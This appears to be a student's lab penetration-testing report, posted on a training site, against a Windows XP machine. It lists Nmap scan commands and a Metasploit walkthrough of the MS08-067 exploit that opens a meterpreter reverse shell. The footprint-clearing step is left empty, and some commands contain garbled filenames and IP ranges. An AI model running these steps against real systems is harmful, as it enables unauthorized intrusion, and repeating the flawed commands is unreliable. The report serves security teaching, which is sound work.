Vulnerability scanning is an inspection of the potential points of exploit on a computer or network to identify security holes. A vulnerability scan detects and classifies system weaknesses in computers, networks and communications equipment and predicts the effectiveness of countermeasures.
Vulnerability Assessment & Penetration Testing Report on Windows XP 2003 done by ICSS Student Shivanshi Sinha. The full project discussed below:
Assessment Vulnerability & Penetration Testing Report on Windows XP 2003
Project Name: Vulnerability Assessment & Penetration testing on Windows XP 2003
Author Name: Shivanshi Sinha
Publish Date: 24-07-2018
Table of Contents
Attack and Penetration
Solution & Recommendation
First and foremost we gather information about the target machine which we have chosen to be Windows-XP 2003 machine. The target machine is on the same network as the remote host.
After running Nmap scan we see all the live hosts and the command is given below.
- nmap -sV -sP 168.43.1/24
Now, the seperated live ip address which is required is saved in a text file using the command given below :
- nmap -sV -sP 168.43.1/24 > nmap.txt
- cat host.txt | grep “for” | cut –d “ “ –f5 > ip.txt
Then Windows-XP machine is searched by running the script to detect the OS of all the live ip’s.
- nmap -sV -O –iL ip.txt > ss.txt
After searching the target , we will move to the next step.
Known vulnerabilities are checked in the searched target. A nmap scan is run to detect the vulnerability in the target.
- nmap -Pn -script vuln 192.168.174.130
Text file is saved.
- nmap -Pn -script vuln 168.174.130 > bst.txt
After scanning we find that the Windows-XP 2003 machine is vulnerable to the vulnerability ms08_067.
Now metasploit is used to exploit .
Attack and Penetration
Msfconsole is used. Hackers all around use metasploit framework that has a huge collection of exploits,payloads and modules .
- Sudo msfconsole
Now we will search for the ms08_067 vulnerability.
- Search ms08_067
Now the following commands are to be executed :
- info exploit/windows/smb/ms08_067_netapi
- use exploit/windows/smb/ms08_067_netapi
Now we see the list of payloads that can perform the attack.
- show payloads
The payload used – windows/meterpreter/reverse_tcp.
- set payload windows/meterpreter/reverse_tcp
- show options
The lhost and rhost is set.
- set rhost 192.168.174.130
- set lhost 192.168.43.11
After getting the meterpreter session, now we can perform following tasks :
To clear the footprints we use
SOLUTIONS & RECOMMENDATIONS
- It is important to delete all traces of your personal information if planning to sell hardware.
- Operating system and other software should be updated This way hackers can be prevented from accessing computers through vulnerabilities in outdated programs.
- Attacks can be minimized by keeping the antivirus and anti-malware ,anti-spyware and firewall
- System becomes pone to hacking if connected to open wifi . Vulnerabilities of some routers can never be Encrypted passwords are required to protect the wifi.
Highest Selling Technical Courses of Indian Cyber Security Solutions:
Cybersecurity services that can protect your company:
Other Location for Online Courses: